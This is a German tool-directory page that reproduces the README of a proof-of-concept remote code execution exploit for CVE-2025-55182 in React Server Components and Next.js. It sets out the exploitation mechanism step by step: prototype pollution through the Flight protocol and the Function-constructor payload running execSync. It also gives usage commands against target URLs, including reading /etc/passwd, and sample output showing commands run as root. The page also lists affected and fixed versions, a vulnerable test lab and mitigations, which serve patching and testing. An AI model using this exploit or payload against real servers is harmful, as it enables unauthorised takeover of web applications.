Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55182_PoC — Proof-of-Concept RCE für CVE‑2025‑55182 unter Ausnutzung des React Flight Protokolls auf Next.js App Router. | Kitploit
Tools/GitHubGitHub/rl0x01/cve-2025-55182_poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubrl0x01/cve-2025-55182_poc

CVE-2025-55182_PoC

Proof-of-Concept RCE für CVE‑2025‑55182 unter Ausnutzung des React Flight Protokolls auf Next.js App Router.

Repository anzeigen
12vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55182 - Proof-of-Concept für RCE in React Server Components

Autor: rl0x01

Beschreibung

CVE-2025-55182 ist eine kritische (CVSS 10.0) Remote Code Execution (RCE)-Schwachstelle, die React Server Components über das Flight-Protokoll betrifft.

Betroffene Versionen

Next.jsReact
14.3.0-canary.77 to 15.0.419.0.0
15.1.1-canary.0 to 15.1.819.1.0
15.2.0-canary.0 to 15.2.519.1.1
15.3.0-canary.0 to 15.3.519.2.0
15.4.0-canary.0 to 15.4.7
15.5.1-canary.0 to 15.5.6
16.0.0-canary.0 to 16.0.6

Behobene Versionen

Next.js
15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7+

Ausnutzungsmechanismus

  1. Verwendet $@, um eine rohe Chunk-Referenz zu erhalten
  2. Überschreibt .then mit Chunk.prototype.then über $1:__proto__:then
  3. Setzt status auf resolved_model, um initializeModelChunk auszulösen
  4. Verwendet $B1337, um Blob-Deserialisierung auszulösen
  5. Zeigt _formData.get auf den Function-Konstruktor
  6. _prefix enthält den auszuführenden JS-Code

Der Code wird ausgewertet über:

root@kitploit:~
Function("throw new Error(require('child_process').execSync('COMMAND').toString());//1337")

Installation

root@kitploit:~
pip install -r requirements.txt

Verwendung

Prüfen, ob das Ziel verwundbar ist

root@kitploit:~
python cve_2025_55182_poc.py https://target.com --check-only

Einen Befehl ausführen

root@kitploit:~
# Default command (id)
python cve_2025_55182_poc.py https://target.com

# Custom command
python cve_2025_55182_poc.py https://target.com -c "whoami"
python cve_2025_55182_poc.py https://target.com -c "cat /etc/passwd"
python cve_2025_55182_poc.py https://target.com -c "dir C:\\"

Optionen

OptionBeschreibung
urlZiel-URL (erforderlich)
-c, --commandAuszuführender Befehl (Standard: id)
--check-onlyNur Verwundbarkeit prüfen
-t, --timeoutTimeout in Sekunden (Standard: 15)
-v, --verboseAusführliche Ausgabe
--rawRohe Antwort anzeigen

Verwundbares Testlabor

root@kitploit:~
cd vulnerable-app
npm install
npm run dev
# Server at http://localhost:3000

Beispielausgabe

root@kitploit:~
+======================================================================+
|  CVE-2025-55182 - React Server Components RCE                     |
|  React Flight Protocol Deserialization Vulnerability               |
+======================================================================+
[*] Affected: React 19.0.0-19.2.0 / Next.js 14.3-16.0.6
[*] CVSS Score: 10.0 (CRITICAL)
[*] Author: rl0x01

[*] Target: http://localhost:3000
[*] Timeout: 15s

[1/2] Checking vulnerability...
[+] VULNERABLE! RCE Confirmed - Output received

[2/2] Executing command: whoami
[+] Payload sent!

============================================================
RESULT: whoami
============================================================
root
============================================================

Projektstruktur

root@kitploit:~
CVE-2025-55182/
├── cve_2025_55182_poc.py    # Main exploit script
├── requirements.txt          # Python dependencies
├── README.md                 # Documentation
└── vulnerable-app/           # Vulnerable Next.js app for testing
    ├── package.json
    ├── next.config.js
    └── app/
        ├── layout.js
        ├── page.js
        └── actions.js

Haftungsausschluss

⚠️ Dieses Tool wird ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt.

Die unbefugte Nutzung dieses Tools gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben, ist illegal.

Gegenmaßnahmen

  1. Aktualisieren Sie Next.js auf 15.0.5+, 15.1.9+, 15.2.6+, 15.3.6+, 15.4.8+, 15.5.7+ oder 16.0.7+
  2. Aktualisieren Sie React auf eine gepatchte Version
  3. Implementieren Sie WAF-Regeln, um bösartige Flight-Protokoll-Payloads zu blockieren
Tool herunterladen